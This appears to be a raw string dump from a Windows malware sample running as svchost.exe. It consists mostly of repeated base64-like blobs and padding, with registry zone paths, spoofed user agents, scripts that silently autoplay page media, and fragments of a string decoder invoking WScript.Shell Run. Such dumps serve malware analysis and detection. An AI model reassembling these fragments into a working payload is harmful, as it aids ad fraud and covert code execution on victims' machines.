vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
.Default
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
svchost.exe
explorer.exe
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
c:\%original file name%.exe path<<c:\%original file name%.exe>>path

svchost.exe_152_rwx_01000000_00006000:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512

svchost.exe_316:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
setcpu:
:setcpu
HTTP/1.1
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
wininet.dll
user32.dll
ntdll.dll
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
Kernel32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
winmm.dll
urlmon.dll
UrlMkSetSessionOption
<%<*<;<@<
:!:%:):-:1:
?:???_?}?
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC 